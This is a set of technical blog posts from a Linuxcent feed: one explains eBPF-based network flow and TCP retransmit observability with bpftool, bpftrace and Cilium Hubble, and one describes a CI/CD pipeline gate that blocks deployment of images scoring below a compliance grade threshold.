This series closes the OS hardening gap. The same principle — declare desired state, build reproducibly, verify automatically — applies to every layer of your infrastructure.

If you’ve been following the eBPF: From Kernel to Cloud series, EP10 covers what happens when you combine kernel-level observability with the hardened base that Stratum provides: every connection, every process spawn, every file access — visible from the host kernel, on an OS baseline you can verify.

The next series: Purple Team Playbook — real attack paths against cloud and Kubernetes infrastructure, how they’re detected, and how they’re closed. Starting May 8.

GitHub: github.com/rrskris/Stratum

Get the Purple Team series in your inbox → linuxcent.com/subscribe

The post Stratum — OS Hardening as a Platform appeared first on Linuxcent.

Network Flow Observability — What Every Connection Reveals

Vamshi Krishna Santhapuri — Fri, 29 May 2026 02:00:00 +0000

Reading Time: 9 minutes

eBPF: From Kernel to Cloud, Episode 10
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf · XDP · TC eBPF · bpftrace · Network Flow Observability · DNS Observability

TL;DR

Network flow observability with eBPF attaches persistent programs to TC hooks and records every connection attempt, retransmit, reset, and drop — continuously, with no sampling
(TC hook = Traffic Control hook: the point in the Linux network stack where eBPF programs intercept packets after ingress or before egress, tied to a specific network interface)
APM tools and service mesh telemetry are interpretations of what happened; kernel-level flow data from TC hooks is the raw event stream they all derive from
Retransmit counters at the kernel level reveal congestion, half-open connections, and remote endpoint failures that application logs never surface
Cilium’s Hubble and similar tools (Pixie, Retina) are eBPF flow exporters — they run TC programs, collect perf_event or ringbuf events, and expose them over an API
You can verify what flow data a tool is actually collecting with four bpftool commands — without reading documentation
Production caution: flow maps grow with the number of active connections; pin and bound your maps, and account for the per-packet overhead on high-throughput interfaces

EP09 showed bpftrace as an on-demand kernel query tool — compile a question, get an answer, clean up. Network flow observability with eBPF is the persistent version: programs that stay attached to TC hooks across your entire fleet, recording every connection without waiting for you to ask. When a client reports intermittent failures that appear nowhere in application logs, that persistent record is what you query. This episode covers how that layer works and how to read it.

Quick Check: What Flow Data Is Your Cluster Already Collecting?

Before building anything new, check what’s already running. If you have Cilium, Pixie, or Retina on your cluster, eBPF flow programs are already attached:

# SSH into a worker node, then:

# What TC programs are attached to cluster interfaces?
bpftool net list

# Expected output on a Cilium node:
# xdp:
#
# tc:
# eth0(2) clsact/ingress prog_id 38 prio 1 handle 0x1 direct-action
# eth0(2) clsact/egress  prog_id 39 prio 1 handle 0x1 direct-action
# lxc12a3(15) clsact/ingress prog_id 41 prio 1 handle 0x1 direct-action
# lxc12a3(15) clsact/egress  prog_id 42 prio 1 handle 0x1 direct-action

# What maps are those programs holding state in?
bpftool map list | grep -A1 -E "_ct|flow|conn|sock|nat"

# Sample output:
# 24: hash  name cilium_ct4_global  flags 0x0
#     key 24B  value 56B  max_entries 65536  memlock 4718592B
# 25: hash  name cilium_ct4_local   flags 0x0
#     key 24B  value 56B  max_entries 8192   memlock 589824B

Each lxcXXXX interface is the host side of a pod’s veth pair. The TC programs on those interfaces are what Cilium uses to enforce NetworkPolicy and collect flow telemetry. If you see prog_id values on pod interfaces, your cluster is already doing kernel-level flow collection.

Not running Cilium? On a plain kubeadm or EKS node whose CNI does not use eBPF, bpftool net list will show no TC programs on pod interfaces. kube-proxy and most non-eBPF CNI plugins program iptables or IPVS rules, which bpftool does not list. You can still attach your own flow programs: tc qdisc add dev eth0 clsact creates the attachment point, and that’s the starting point this episode covers.

The client opened a ticket on a Tuesday afternoon. “Intermittent connection failures to the payment gateway. Started around 11 AM. Application logs say timeout. Retry logic is masking it for most users but the error rate is up 0.3%.”

I looked at the APM dashboard. The service showed elevated latency — p99 at 850ms versus a normal 120ms — but no hard errors at the application layer. The service mesh metrics showed the downstream call succeeding from the mesh’s perspective. The payment gateway team said their side looked clean.

Three tools. Three different answers. All of them interpreting the network. None of them were the network.

I ran:

bpftool map dump id 24 | grep -A5 "payment-gateway-ip"

The connection tracking map showed retransmit count 14 for a specific (src_ip, dst_ip, src_port, dst_port, protocol) tuple: the same 5-tuple, every 30 seconds, for 2 hours. The kernel was retransmitting. The TCP stack was compensating. The application was seeing sporadic success because retransmits eventually got through. The APM dashboard averaged that latency into a p99 and called it “elevated.”

The kernel had the truth. Everything above it was rounding.

Why Application-Level Metrics Miss What the Kernel Sees

Application metrics — APM spans, service mesh telemetry, load balancer health checks — operate at Layer 7. They measure round-trip time for complete requests, error codes returned, bytes transferred. They answer “did this request succeed?” not “what did the network do to make it succeed?”

The TCP stack underneath those requests handles retransmits, congestion window adjustments, RST packets, and half-open connections silently. From an application’s perspective, a request that required 3 retransmits before the ACK arrived looks identical to one that succeeded on the first attempt — slightly slower, but successful.

This is structural, not a tooling gap. Application-layer observability tools cannot see below their own protocol boundary. The kernel’s TCP implementation does not report upward when it retransmits. It just retransmits.

eBPF flow observability closes this gap by attaching programs directly to the network path — at the TC hook, which fires on every packet crossing a network interface — and recording what the kernel actually does.

How TC Hook Flow Programs Work

EP08 covered TC eBPF programs for pod network policy. Flow observability uses the same attachment point with a different purpose: instead of allowing or dropping packets, the program reads packet metadata and writes it to a map or ring buffer.

Pod sends packet
      ↓
veth interface (lxcXXXX)
      ↓
TC clsact/egress hook fires
      ↓
eBPF program reads:
  - src IP, dst IP
  - src port, dst port
  - protocol
  - packet size
  - TCP flags (SYN, ACK, FIN, RST) and sequence numbers
    (a repeated sequence number indicates a retransmit)
      ↓
Writes event to ringbuf (or perf_event_array)
      ↓
Userspace consumer reads ringbuf
      ↓
Aggregates to flow record
      ↓
Exports to Hubble/Prometheus/flow store

ringbuf — a BPF ring buffer: a lock-free, memory-efficient queue shared between a kernel eBPF program and a userspace consumer. The kernel program writes events; the userspace reader drains them. Used instead of perf_event_array in kernel 5.8+ because a single buffer shared across CPUs avoids per-CPU memory waste and preserves event ordering. When you see Hubble exporting flows, it’s reading from a ringbuf that the TC program writes to.

The key structural property: the TC hook fires on every packet. Not sampled. Not throttled by default. Every SYN, every ACK, every RST, every retransmit. For flow observability, you typically aggregate at the program level — count packets and bytes per 5-tuple per second, rather than emitting an event per packet — but the raw visibility is there if you need it.
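The per-second aggregation described above can be sketched in Python. This is a userspace illustration of the bookkeeping only; in a real flow exporter the counters would live in a BPF map updated by the TC program. The tuple layout and the name aggregate_flows are assumptions made for the example.

```python
from collections import defaultdict


def aggregate_flows(packets):
    """Collapse per-packet records into per-second, per-5-tuple counters.

    packets: iterable of (ts, src_ip, dst_ip, src_port, dst_port, proto, size)
    returns: {(second, src_ip, dst_ip, src_port, dst_port, proto): {"packets", "bytes"}}
    """
    flows = defaultdict(lambda: {"packets": 0, "bytes": 0})
    for ts, src_ip, dst_ip, src_port, dst_port, proto, size in packets:
        # Truncating the timestamp buckets packets into one-second windows.
        key = (int(ts), src_ip, dst_ip, src_port, dst_port, proto)
        flows[key]["packets"] += 1
        flows[key]["bytes"] += size
    return dict(flows)


if __name__ == "__main__":
    sample = [
        (100.1, "10.244.1.5", "172.16.4.23", 40000, 443, "tcp", 100),
        (100.9, "10.244.1.5", "172.16.4.23", 40000, 443, "tcp", 200),
        (101.2, "10.244.1.5", "172.16.4.23", 40000, 443, "tcp", 50),
    ]
    for key, counters in aggregate_flows(sample).items():
        print(key, counters)
```

Aggregating this way trades per-packet detail for a bounded event rate: the output grows with the number of active flows per second, not with the packet rate.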

What Retransmit Telemetry Actually Reveals

Most flow observability implementations track TCP retransmits specifically because they are the clearest signal of network-layer trouble invisible to applications.

A TCP retransmit happens when a sender doesn’t receive an ACK within the retransmission timeout (RTO). The kernel resends the segment and doubles the timeout (exponential backoff). From the application’s perspective, the call takes longer. If retransmits keep clearing, the application sees success — just slow success.
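To make the backoff concrete, this small Python sketch computes how long each retransmit waits and how much time has passed in total. The 1-second starting timeout and the 120-second cap are illustrative parameters assumed for the example; a live connection derives its RTO from measured round-trip time.

```python
def rto_schedule(initial_rto: float = 1.0, retries: int = 6, max_rto: float = 120.0):
    """Return (attempt, timeout_before_retransmit, cumulative_elapsed) tuples."""
    schedule = []
    rto = initial_rto
    elapsed = 0.0
    for attempt in range(1, retries + 1):
        elapsed += rto                 # the sender waits one full RTO, then resends
        schedule.append((attempt, rto, elapsed))
        rto = min(rto * 2, max_rto)    # exponential backoff, capped at max_rto
    return schedule


if __name__ == "__main__":
    for attempt, timeout, elapsed in rto_schedule(retries=4):
        print(f"retransmit {attempt}: waited {timeout:.0f}s, {elapsed:.0f}s since first send")
```

With these parameters, four retransmits already account for 15 seconds of waiting, which is the kind of delay an application reports only as a slow request.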

perf_event — a kernel mechanism for collecting performance data. In eBPF, BPF_MAP_TYPE_PERF_EVENT_ARRAY lets kernel programs push variable-length records to userspace readers via a ring buffer per CPU. Older tools use perf_event_array; newer ones use BPF_MAP_TYPE_RINGBUF (single shared ring, more efficient). If you inspect an older version of Cilium’s flow exporter, you’ll see perf_event writes; newer versions use ringbuf.

To observe retransmits directly with bpftrace:

# Count retransmit events per destination IP — run for 60 seconds
bpftrace -e '
kprobe:tcp_retransmit_skb {
    $sk = (struct sock *)arg0;
    $daddr = ntop($sk->__sk_common.skc_daddr);  // 32-bit address, so ntop() formats it as IPv4 without needing AF_INET defined
    @retransmits[$daddr] = count();
}
interval:s:60 { print(@retransmits); clear(@retransmits); exit(); }
'

Sample output:

Attaching 2 probes...
@retransmits[10.96.0.10]:   2       # DNS service — normal
@retransmits[172.16.4.23]:  847     # payment gateway endpoint ← problem here
@retransmits[10.244.1.5]:   1       # normal pod-to-pod traffic

847 retransmits to a single endpoint in 60 seconds. That’s not noise. That’s a congested or half-open connection being retried 14 times per second by the TCP stack while the application layer averages it into “elevated latency.”

How Cilium Hubble Collects Flow Data

Hubble is the flow observability layer built into Cilium. Understanding how it works makes you able to reason about what it can and cannot see — and how to verify what it’s actually collecting.

Hubble’s architecture:

Kernel (per node)
├── TC eBPF programs on all pod veth interfaces
│     write flow events → BPF ringbuf
│
└── Hubble node agent (userspace)
      reads ringbuf
      enriches with pod metadata (Kubernetes API)
      exposes gRPC API

Cluster level
└── Hubble Relay
      aggregates per-node gRPC streams
      exposes single cluster-wide API

User tooling
└── hubble observe  /  Hubble UI  /  Prometheus exporter

The TC programs are writing raw packet events. The Hubble agent is the consumer that translates those events into Kubernetes-aware flow records — adding pod name, namespace, label, and policy verdict on top of the 5-tuple and TCP metadata the kernel provides.

To see what Hubble’s TC programs have attached:

# On any Cilium node
bpftool net list | grep lxc

# lxce4a1(23) clsact/ingress prog_id 61  ← Hubble flow program on pod interface ingress
# lxce4a1(23) clsact/egress  prog_id 62  ← Hubble flow program on pod interface egress
# lxcf7b2(31) clsact/ingress prog_id 63
# lxcf7b2(31) clsact/egress  prog_id 64

# Inspect one of those programs to confirm it's reading flow metadata
bpftool prog show id 61

# Output:
# 61: sched_cls  name tail_handle_nat  tag 3a8e2f1b4c7d9e0a  gpl
#     loaded_at 2026-04-22T09:13:45+0530  uid 0
#     xlated 2144B  jited 1382B  memlock 4096B  map_ids 24,31,38
#     btf_id 142

sched_cls is the BPF program type for TC — confirming these are TC-attached flow programs. map_ids 24,31,38 — those are the maps this program reads from and writes to. You can dump any of them:

bpftool map dump id 24 | head -40

# Output (connection tracking entry):
# [{
#     "key": {
#         "saddr": "10.244.1.5",        # ← source pod IP
#         "daddr": "172.16.4.23",        # ← destination IP
#         "sport": 48291,                # ← source port
#         "dport": 443,                  # ← destination port
#         "nexthdr": 6,                  # ← protocol: TCP
#         "flags": 3                     # ← CT_EGRESS | CT_ESTABLISHED
#     },
#     "value": {
#         "rx_packets": 14832,           # ← packets received
#         "tx_packets": 14831,           # ← packets sent
#         "rx_bytes": 3841024,           # ← bytes received
#         "tx_bytes": 3756288,           # ← bytes sent
#         "lifetime": 21600,             # ← seconds until entry expires
#         "rx_closing": 0,
#         "tx_closing": 0
#     }
# }]

That’s the ground truth. Not an APM span. Not a service mesh metric. The actual per-connection counters the kernel is maintaining for that 5-tuple.

Writing a Minimal Flow Observer with bpftrace

You don’t need Cilium or Hubble to get flow telemetry. bpftrace can produce it directly on any node with BTF:

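# Flow table: send calls per process and destination, printed every 30s for 2 minutes
bpftrace -e '
kprobe:tcp_sendmsg {
    $sk = (struct sock *)arg0;
    // skc_daddr is a 32-bit value, so single-argument ntop() formats it as IPv4
    $daddr = ntop($sk->__sk_common.skc_daddr);
    // skc_dport is stored in network byte order; bswap() converts it to host order
    $dport = bswap($sk->__sk_common.skc_dport);
    @flows[comm, $daddr, $dport] = count();
}
interval:s:30 { print(@flows); clear(@flows); }
interval:s:120 { exit(); }
'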

Sample output (every 30 seconds):

@flows[curl, 93.184.216.34, 443]:         12    # curl → example.com:443
@flows[coredns, 10.96.0.10, 53]:          341   # CoreDNS upstream queries
@flows[payment-svc, 172.16.4.23, 443]:   1204   # payment service → gateway
@flows[nginx, 10.244.2.3, 8080]:          89    # nginx → upstream pod

For retransmit tracking specifically:

# Combined flow + retransmit watcher — runs until Ctrl-C
bpftrace -e '
kprobe:tcp_retransmit_skb {
    $sk = (struct sock *)arg0;
    // single-argument ntop() formats the 32-bit skc_daddr as IPv4
    $daddr = ntop($sk->__sk_common.skc_daddr);
    @retx[comm, $daddr] = count();
}
kprobe:tcp_sendmsg {
    $sk = (struct sock *)arg0;
    $daddr = ntop($sk->__sk_common.skc_daddr);
    @sends[comm, $daddr] = count();
}
interval:s:10 {
    printf("=== Retransmit ratio (last 10s) ===\n");
    print(@retx);
    print(@sends);
    clear(@retx);
    clear(@sends);
}
'

This gives you both the volume of sends and the retransmit count side by side — the ratio tells you whether retransmits are a rounding error (0.01%) or a signal (5%+).
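The ratio itself is easy to compute from the printed maps. The sketch below parses bpftrace map lines and divides retransmits by send calls per destination. It sums across `comm` on purpose: retransmits are often fired from timer context, so the `comm` recorded in `@retx` may not be the process that owns the socket. The sample text is made up for illustration.

```python
import re

# Matches bpftrace map lines such as "@retx[payment-svc, 172.16.4.23]: 60"
LINE = re.compile(r"^@(\w+)\[(.+), ([0-9.]+)\]:\s+(\d+)$")


def per_destination(text):
    """Return {map_name: {daddr: count}}, summing over the comm key."""
    totals = {}
    for line in text.splitlines():
        match = LINE.match(line.strip())
        if match:
            name, _comm, daddr, count = match.groups()
            per_map = totals.setdefault(name, {})
            per_map[daddr] = per_map.get(daddr, 0) + int(count)
    return totals


def retransmit_ratios(text):
    """Retransmits divided by send calls for each destination seen in both maps."""
    totals = per_destination(text)
    sends = totals.get("sends", {})
    return {daddr: retx / sends[daddr]
            for daddr, retx in totals.get("retx", {}).items()
            if sends.get(daddr)}


sample = """\
=== Retransmit ratio (last 10s) ===
@retx[payment-svc, 172.16.4.23]: 40
@retx[swapper/3, 172.16.4.23]: 20
@retx[coredns, 10.96.0.10]: 1
@sends[payment-svc, 172.16.4.23]: 1200
@sends[coredns, 10.96.0.10]: 5000
"""
ratios = retransmit_ratios(sample)
```

In this made-up sample the payment gateway sits at 5% while DNS is at 0.02%, the signal-versus-noise split described above.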

Production Gotchas

Map size bounds matter. Connection tracking maps default to tens of thousands of entries. On nodes with high connection churn (serverless, short-lived batch jobs), maps can fill and start dropping new entries silently. Check bpftool map show id N for max_entries and monitor map utilization. Cilium exposes this as cilium_bpf_map_pressure in Prometheus.

Per-packet overhead on high-throughput interfaces. A TC program that fires on every packet on a 10Gbps interface processes millions of packets per second. Aggregating at the program level (count per 5-tuple rather than emit per packet) keeps overhead manageable — Cilium does this. A naive bpftrace one-liner that emits a perf event per packet will saturate the perf ring buffer under real load. Use ringbuf write paths or aggregate before emitting.

TC hook placement and direction confusion. Ingress TC on a pod’s veth (lxcXXXX) sees egress traffic from the pod’s perspective — because the host sees the packet arriving on the veth after the pod sent it. This reversal is consistent but confusing when you’re reading direction labels in flow records. EP08 covered this in detail for policy enforcement; the same asymmetry applies to flow data.

Retransmit counters reset on connection close. If you’re tracking retransmit totals for a long-lived connection, the count is stored in the kernel’s socket state and is cleared when the socket closes. For persistent tracking across reconnects, aggregate at the flow level in userspace before the connection closes.

Hubble flow visibility requires pod interfaces. Hubble only sees traffic that crosses a pod’s veth interface. Node-to-node traffic that doesn’t involve a pod (e.g., node SSH, kubelet-to-API-server on the node IP) is not captured by default. For host-level network observability, you need a TC program on the physical interface (eth0, ens3), not just on pod veth pairs.
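For the map-size gotcha above, a small utilization check is often enough to catch a filling map early. This is a sketch under assumptions: the input records are hypothetical, `max_entries` is what `bpftool map show` reports, and the current entry count is assumed to come from counting dumped entries or from an exported metric.

```python
def map_pressure(entries, max_entries):
    """Fraction of the map that is in use (0.0 to 1.0)."""
    if max_entries <= 0:
        raise ValueError("max_entries must be positive")
    return entries / max_entries


def maps_under_pressure(maps, warn_at=0.9):
    """Return (id, name, pressure) for every map at or above warn_at."""
    flagged = []
    for m in maps:
        pressure = map_pressure(m["entries"], m["max_entries"])
        if pressure >= warn_at:
            flagged.append((m["id"], m["name"], pressure))
    return flagged


# Hypothetical inventory; names and counts are illustrative only
inventory = [
    {"id": 24, "name": "ct_map", "entries": 61000, "max_entries": 65536},
    {"id": 31, "name": "policy_map", "entries": 120, "max_entries": 16384},
]
flagged = maps_under_pressure(inventory)
```

The 0.9 cutoff is arbitrary; pick a threshold that leaves enough headroom for your connection churn.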

Quick Reference

What you want to see	Command
What TC programs are attached	`bpftool net list`
Which maps a program uses	`bpftool prog show id N` (check `map_ids`)
Connection tracking entries	`bpftool map dump id N`
Retransmits per destination	`bpftrace -e 'kprobe:tcp_retransmit_skb { ... }'`
Flow counts per process	`bpftrace -e 'kprobe:tcp_sendmsg { @[comm, daddr] = count(); }'`
Hubble flow stream (Cilium)	`hubble observe --follow`
Hubble flows for one pod	`hubble observe --pod mynamespace/mypod --follow`
Verify map pressure	`bpftool map show id N` (check `max_entries` vs entries)

Kernel function	What it marks
`tcp_sendmsg`	Data being sent on a TCP socket
`tcp_recvmsg`	Data being received on a TCP socket
`tcp_retransmit_skb`	A segment being retransmitted
`tcp_send_reset`	RST being sent
`tcp_fin`	FIN received from the peer (remote side started teardown)
`tcp_connect`	New outbound TCP connection attempt

Key Takeaways

Network flow observability with eBPF attaches TC programs that record every connection event continuously — not sampled, not throttled, not filtered by what the application reports
Retransmit telemetry from tcp_retransmit_skb reveals congestion and endpoint failures that are structurally invisible to application-layer monitoring tools
Cilium Hubble, Pixie, and Retina are all eBPF flow exporters: they attach kernel programs (TC hooks, kprobes, or both, depending on the tool), drain a ring or perf buffer, enrich with Kubernetes metadata, and expose the result over an API
You can verify what any flow tool is actually collecting with bpftool net list, bpftool prog show, and bpftool map dump: three commands, no documentation needed
Map sizing and per-packet overhead are the two production concerns; aggregate at the kernel level, bound your maps, and monitor map pressure
The kernel’s connection tracking map is the ground truth. APM dashboards, service mesh metrics, and load balancer health checks are all interpretations of what that map contains

What’s Next

Flow observability tells you what connections exist. EP11 goes one level deeper: what names your pods are resolving those connections to. DNS is where a compromised workload first reveals itself — it queries a domain that has no business being queried from a production pod, and if you’re not watching the kernel-level DNS path, you won’t see it until after the damage.

DNS observability at the kernel level uses tracepoint hooks on the DNS syscall path — the same ground-truth approach as flow telemetry, but for name resolution: every query, every response, tied to the pod that made it, without deploying a sidecar.

Next: DNS observability at the kernel level — what your pods are actually resolving

Get EP11 in your inbox when it publishes → linuxcent.com/subscribe

The post Network Flow Observability — What Every Connection Reveals appeared first on Linuxcent.

The Pipeline Gate — Hardened Images as a CI/CD Build Constraint

Vamshi Krishna Santhapuri — Sat, 23 May 2026 02:00:00 +0000

Reading Time: 6 minutes

OS Hardening as Code, Episode 5
Cloud AMI Security Risks · Linux Hardening as Code · Multi-Cloud OS Hardening · Automated OpenSCAP Compliance · CI/CD Compliance Gate

TL;DR

A CI/CD compliance gate turns an OS hardening grade from a report into a build constraint — unhardened images fail the pipeline before they can be deployed
POST /api/pipeline/scan returns pass/fail against a minimum grade threshold — integrates into any CI/CD system that can make an HTTP request
Failed gate output tells engineers exactly which controls failed and what to fix — not just “blocked”
The gate works on both build-time grades (new images) and runtime grades (existing instances)
GitHub Actions, GitLab CI, Jenkins, and Tekton integrations are one curl command
The structural guarantee: an image that doesn’t pass the gate doesn’t exist in the deployment pipeline

The Problem: A Grade No One Checks Is Decoration

Pipeline without compliance gate:
  Build → Test → Security scan (results to dashboard) → Deploy

What actually happens:
  Build → Test → Security scan → "C grade, but we need to ship" → Deploy anyway
                                           │
                                           └─ Dashboard shows C grade
                                              Nobody is paged
                                              Deployment succeeds

A CI/CD compliance gate means the pipeline can’t continue if the grade is below threshold.

EP04 showed that automated OpenSCAP compliance gives every image a verified, reproducible grade before deployment. What it assumed is that someone checks the grade before deploying. They don’t — not under deadline pressure, not when the image has been “working fine for months,” not at 2am.

The same problem that made hardening runbooks skippable applies to compliance grades: if checking the grade is a discretionary step, it will be skipped.

A new microservice was deployed from an unhardened base image. The team had built it quickly during a sprint, used a community AMI as the base, and planned to harden it “in the next sprint.”

Three weeks later, a penetration test found it. SSH password authentication enabled. Three unnecessary services running — one of them with a known CVE. The finding: the instance had full inbound access from the VPC and was reachable from a compromised adjacent instance.

The deployment had gone through the normal CI/CD pipeline. Unit tests passed. Integration tests passed. A vulnerability scan ran. The scan produced a report that went to a dashboard. Nobody had a gate set up to fail the build if the image was unhardened.

The hardening work from the “next sprint” plan would have taken four hours. The pentest remediation took a week, plus the time to investigate what had been exposed during the three weeks the instance was running.

The CI/CD pipeline had every check except the one that would have caught the base image problem before the first deployment.

The Pipeline API

The Pipeline API is a single HTTP endpoint that takes an image or instance ID, checks it against a minimum grade, and returns pass or fail:

# Fail the pipeline if the image grade is below B
curl -sf -X POST https://stratum.yourdomain.com/api/pipeline/scan \
  -H "Authorization: Bearer ${STRATUM_TOKEN}" \
  -H "Content-Type: application/json" \
  -d '{
    "image_id": "ami-0a7f3c9e82d1b4c05",
    "min_grade": "B"
  }'

# Pass response (grade A):
# HTTP 200
# {
#   "result": "pass",
#   "image_id": "ami-0a7f3c9e82d1b4c05",
#   "grade": "A",
#   "score": 94,
#   "controls_passing": 94,
#   "controls_total": 100,
#   "scanned_at": "2026-04-19T15:54:10Z"
# }

# Fail response (grade C):
# HTTP 422
# {
#   "result": "fail",
#   "image_id": "ami-0c9d5e3f81a2b6e07",
#   "grade": "C",
#   "score": 72,
#   "min_grade_required": "B",
#   "failing_controls": [
#     { "id": "1.1.7", "title": "Separate partition for /var/log/audit", "severity": "high" },
#     { "id": "3.3.2", "title": "TCP SYN cookies enabled", "severity": "medium" },
#     ...
#   ]
# }

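A non-2xx response fails the pipeline. curl’s -f flag makes curl exit non-zero when the server returns an HTTP error such as 422, so the pipeline step fails on its own; the || { echo ...; exit 1; } wrapper in the GitHub Actions integration only adds a readable message. Note that -f also discards the response body on failure. To get failing_controls into the CI log, use --fail-with-body (curl 7.76.0 or newer) instead.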
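For CI systems where a script is easier to maintain than a curl one-liner, the pass/fail decision can be sketched as a pure function. The field names follow the sample responses above; the function name and the fail-closed behaviour for unparseable bodies are assumptions made for illustration.

```python
import json


def gate_exit_code(status_code, body):
    """Return 0 when the gate passes and 1 otherwise.

    Anything unexpected (non-200 status, invalid JSON, missing field)
    is treated as a failure so the pipeline fails closed.
    """
    if status_code != 200:
        return 1
    try:
        data = json.loads(body)
    except ValueError:
        return 1
    return 0 if data.get("result") == "pass" else 1


passed = gate_exit_code(200, '{"result": "pass", "grade": "A", "score": 94}')
blocked = gate_exit_code(422, '{"result": "fail", "grade": "C", "score": 72}')
garbled = gate_exit_code(200, "<html>proxy error</html>")
```

Failing closed matters here: a proxy error page returned with HTTP 200 should block the deploy, not wave it through.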

GitHub Actions Integration

# .github/workflows/deploy.yml

jobs:
  build-image:
    runs-on: ubuntu-latest
    outputs:
      ami_id: ${{ steps.build.outputs.ami_id }}
    steps:
      - name: Build hardened AMI
        id: build
        run: |
          AMI_ID=$(stratum build \
            --blueprint ubuntu22-cis-l1.yaml \
            --provider aws \
            --output json | jq -r '.image_id')
          echo "ami_id=${AMI_ID}" >> $GITHUB_OUTPUT

  compliance-gate:
    runs-on: ubuntu-latest
    needs: build-image
    steps:
      - name: Stratum compliance gate
        run: |
          curl -sf -X POST ${{ vars.STRATUM_URL }}/api/pipeline/scan \
            -H "Authorization: Bearer ${{ secrets.STRATUM_TOKEN }}" \
            -H "Content-Type: application/json" \
            -d "{\"image_id\": \"${{ needs.build-image.outputs.ami_id }}\", \"min_grade\": \"B\"}" \
            || { echo "Compliance gate failed — image does not meet minimum grade B"; exit 1; }

  deploy:
    runs-on: ubuntu-latest
    needs: [build-image, compliance-gate]
    steps:
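      - name: Deploy to staging
        run: |
          # Register the gated AMI as a new launch template version
          # ("my-launch-template" is a placeholder name)
          aws ec2 create-launch-template-version \
            --launch-template-name my-launch-template \
            --source-version '$Latest' \
            --launch-template-data "{\"ImageId\":\"${{ needs.build-image.outputs.ami_id }}\"}"
          # Point the autoscaling group at the newest template version
          aws autoscaling update-auto-scaling-group \
            --auto-scaling-group-name my-asg \
            --launch-template 'LaunchTemplateName=my-launch-template,Version=$Latest'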

The deploy job only runs if compliance-gate passes. The AMI doesn’t reach the autoscaling group if it doesn’t meet the grade threshold.

GitLab CI Integration

# .gitlab-ci.yml

stages:
  - build
  - compliance
  - deploy

build-image:
  stage: build
  script:
    - |
      AMI_ID=$(stratum build \
        --blueprint ubuntu22-cis-l1.yaml \
        --provider aws \
        --output json | jq -r '.image_id')
      echo "AMI_ID=${AMI_ID}" >> build.env
  artifacts:
    reports:
      dotenv: build.env

compliance-gate:
  stage: compliance
  needs: [build-image]
  script:
    - |
      curl -sf -X POST ${STRATUM_URL}/api/pipeline/scan \
        -H "Authorization: Bearer ${STRATUM_TOKEN}" \
        -H "Content-Type: application/json" \
        -d "{\"image_id\": \"${AMI_ID}\", \"min_grade\": \"B\"}"

deploy:
  stage: deploy
  needs: [build-image, compliance-gate]
  script:
    - ./deploy.sh ${AMI_ID}

What the Failed Gate Tells You

The value of the CI/CD compliance gate is not just that it blocks bad images — it’s that the failure output tells engineers what to fix.

A gate failure in CI shows:

Compliance gate failed.

Image: ami-0c9d5e3f81a2b6e07
Grade: C (72/100)
Required: B (85/100)
Gap: 13 points below threshold (28 controls failing)

Failing controls:
  HIGH   1.1.7   Separate partition for /var/log/audit
                 Fix: Provision /var/log/audit on a separate EBS volume
  MEDIUM 1.6.1.3 AppArmor enabled in bootloader
                 Fix: Update GRUB_CMDLINE_LINUX, run update-grub, reboot
  MEDIUM 3.3.2   TCP SYN cookies
                 Fix: echo "net.ipv4.tcp_syncookies=1" > /etc/sysctl.d/60-cis.conf
  LOW    5.2.21  SSH MaxStartups
                 Fix: Add "MaxStartups 10:30:60" to /etc/ssh/sshd_config
  ...

View full scan report: https://stratum.yourdomain.com/scans/ami-0c9d5e3f81a2b6e07

This is not a wall — it’s a list of exactly what to fix. The engineer running the pipeline sees the gap, fixes the blueprint or the Ansible role, rebuilds, and the gate passes. The gap is closed before any instance is deployed.
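A report like the one above can be rendered from the fail response with a short formatter. This is a sketch, not Stratum's own renderer: it assumes the JSON fields shown in the sample fail response and sorts controls so the highest severity appears first.

```python
SEVERITY_RANK = {"high": 0, "medium": 1, "low": 2}


def render_failures(response):
    """Format a fail response as a CI log block, highest severity first."""
    controls = sorted(
        response["failing_controls"],
        key=lambda c: (SEVERITY_RANK.get(c["severity"], 99), c["id"]),
    )
    lines = [
        "Compliance gate failed.",
        f"Image: {response['image_id']}",
        f"Grade: {response['grade']} ({response['score']}/100)",
        f"Required: {response['min_grade_required']}",
        "Failing controls:",
    ]
    for c in controls:
        lines.append(f"  {c['severity'].upper():<6} {c['id']:<8} {c['title']}")
    return "\n".join(lines)


response = {
    "image_id": "ami-0c9d5e3f81a2b6e07",
    "grade": "C",
    "score": 72,
    "min_grade_required": "B",
    "failing_controls": [
        {"id": "3.3.2", "title": "TCP SYN cookies enabled", "severity": "medium"},
        {"id": "1.1.7", "title": "Separate partition for /var/log/audit", "severity": "high"},
    ],
}
report = render_failures(response)
```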

Runtime Gate: Checking Existing Instances

The Pipeline API also works against running instances, not just images:

# Gate on a running instance's current compliance state
curl -sf -X POST https://stratum.yourdomain.com/api/pipeline/scan \
  -H "Authorization: Bearer ${STRATUM_TOKEN}" \
  -H "Content-Type: application/json" \
  -d '{
    "instance_id": "i-0abc123",
    "min_grade": "B",
    "scan_type": "runtime"
  }'

This is useful in deployment pipelines that don’t build custom AMIs — they launch instances and configure them after launch. The runtime gate runs after configuration is complete and before the instance is registered with the load balancer.

It also integrates into scheduled compliance jobs — scan your fleet on a schedule and alert when any instance drifts below grade threshold.

Grade Thresholds by Environment

Not all environments need the same threshold. A common pattern:

# Environment-specific minimum grades
environments:
  production: A      # 95%+ passing — no exceptions
  staging:    B      # 85%+ passing — minor gaps acceptable
  development: C     # 70%+ passing — experimental OK

# Production deploy gate
curl -sf -X POST .../api/pipeline/scan \
  -d '{"image_id": "ami-...", "min_grade": "A"}'

# Staging deploy gate
curl -sf -X POST .../api/pipeline/scan \
  -d '{"image_id": "ami-...", "min_grade": "B"}'

This lets development move fast with a lower bar while enforcing the highest standard at the production gate.
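The environment mapping boils down to an ordered comparison of letter grades. A minimal sketch, assuming the three environments and minimum grades listed above; the function name is hypothetical.

```python
GRADES = ["F", "D", "C", "B", "A"]  # worst to best
MIN_GRADE = {"production": "A", "staging": "B", "development": "C"}


def meets_threshold(grade, environment):
    """True when the image grade is at or above the environment minimum."""
    return GRADES.index(grade) >= GRADES.index(MIN_GRADE[environment])


ok_for_staging = meets_threshold("B", "staging")
ok_for_production = meets_threshold("B", "production")
```

Keeping the mapping in one place means the pipeline passes an environment name and never hard-codes a grade in each job.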

Production Gotchas

Gate latency on first scan: If the image hasn’t been scanned yet, the Pipeline API triggers a scan on demand. This takes 2–3 minutes. For build pipelines that want instant gate results, use stratum build --blueprint ... --scan-on-build to ensure the scan runs during the build step and the result is cached for the gate call.

